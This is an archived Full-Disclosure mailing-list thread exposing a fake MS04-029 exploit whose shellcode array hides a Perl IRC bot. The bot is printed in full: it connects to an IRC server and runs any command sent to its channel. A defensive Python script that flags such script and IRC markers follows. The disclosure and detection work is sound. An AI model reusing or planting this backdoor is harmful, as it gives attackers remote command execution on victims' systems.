Message-ID: <9E97F0997FB84D42B221B9FB203EFA272D9C74@dc1ms2.msad.brookshires.net>
From: toddtowles at brookshires.com (Todd Towles)
Subject: New Remote Windows Exploit (MS04-029)
Yep, Dave pointed that out really fast...
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
> Barrie Dempster
> Sent: Wednesday, November 03, 2004 3:19 PM
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
>
>
> Excellent exploit, I'm sure no one will spot that perl IRC
> bot in there, nope no one will see that...
>
> (hint for the readers, try looking at the ASCII output of
> the "char *shellcode_payload=" data, looks a little like the
> following....)
>
> [code]
> #!/usr/bin/perl
> $c
> han="#0x";$nick="k
> ";$server="ir3ip.n
> et";$SIG{TERM}={};
> exit if fork;use I
> O::Socket;$sock =
> IO::Socket::INET->
> new($server.":6667
> ")||exit;print $so
> ck "USER k +i k :k
> v1\nNICK k\n";$i=1
> ;while(<$sock>=~/^
> [^ ]+ ([^ ]+) /){$
> mode=$1;last if $m
> ode=="001";if($mod
> e=="433"){$i++;$ni
> ck=~s/\d*$/$i/;pri
> nt $sock "NICK $ni
> ck\n";}}print $soc
> k "JOIN $chan\nPRI
> VMSG $chan :Hi\n";
> while(<$sock>){if
> (/^PING (.*)$/){pr
> int $sock "PONG $1
> \nJOIN $chan\n";}i
> f(s/^[^ ]+ PRIVMSG
> $chan :$nick[^ :\
> w]*:[^ :\w]* (.*)$
> /$1/){s/\s*$//;$_=
> `$_`;foreach(split
> "\n"){print $sock
> "PRIVMSG $chan :$
> _\n";sleep 1;}}}#/
> tmp/hi
>
> [/code]
>
> --
> Barrie Dempster (zeedo) - Fortiter et Strenue
>
> http://www.bsrf.org.uk
>
> [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
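A defender's-eye version of Barrie's hint, added here as an example that is not part of the thread: decode a C `shellcode_payload` initializer back to raw bytes and list the printable runs that contain script or IRC markers, which is how an embedded Perl bot stands out from genuine machine code. The sample array, the marker list and the hostname are constructed for the demonstration.

```python
import re

# Constructed sample of a C "shellcode" array in the shape the thread describes; bytes and hostname are made up.
SAMPLE_C = r'''
unsigned char shellcode_payload[] =
  "\x90\x90\x90\x90\x31\xc0\xeb\x0e"
  "#!/usr/bin/perl\n$chan=\"#0x\";"
  "\x90\x90use IO::Socket;\x90\x90"
  "new(\"irc.example.invalid:6667\")";
'''

# Fragments that belong to a script or an IRC session, not to machine code.
SCRIPT_MARKERS = ("#!/usr/", "/bin/sh", "IO::Socket", "PRIVMSG", "NICK ", "JOIN ", ":6667")


def unescape_c(lit: str) -> bytes:
    """Turn the body of one C string literal into raw bytes (hex, octal and simple escapes)."""
    out, i = bytearray(), 0
    while i < len(lit):
        nxt = lit[i + 1] if lit[i] == "\\" else None
        if nxt is None:                      # ordinary character
            out += lit[i].encode("latin-1")
            i += 1
        elif nxt == "x":                     # \xHH, two hex digits as in typical dumps
            m = re.match(r"[0-9a-fA-F]{1,2}", lit[i + 2:])
            out.append(int(m.group(), 16))
            i += 2 + len(m.group())
        elif nxt in "01234567":              # \ooo octal escape
            m = re.match(r"[0-7]{1,3}", lit[i + 1:])
            out.append(int(m.group(), 8))
            i += 1 + len(m.group())
        else:                                # \n, \t, \", \\ and friends
            out.append({"n": 10, "r": 13, "t": 9}.get(nxt, ord(nxt)))
            i += 2
    return bytes(out)


def decode_c_literal(src: str) -> bytes:
    """Concatenate every double-quoted literal in a C array initializer."""
    return b"".join(unescape_c(p) for p in re.findall(r'"((?:[^"\\]|\\.)*)"', src, re.S))


def printable_runs(data: bytes, min_len: int = 6) -> list:
    """strings(1)-style: runs of printable ASCII (plus newline/tab) of min_len or more."""
    pat = rb"[\x20-\x7e\n\t]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, data)]


def suspicious_strings(c_source: str) -> list:
    """Decode the array and return the printable runs that contain a script marker."""
    runs = printable_runs(decode_c_literal(c_source))
    return [r for r in runs if any(mk in r for mk in SCRIPT_MARKERS)]
```

Running `suspicious_strings` over a real exploit's source before compiling it surfaces exactly the kind of hidden `#!/usr/bin/perl` and IRC strings the thread is about.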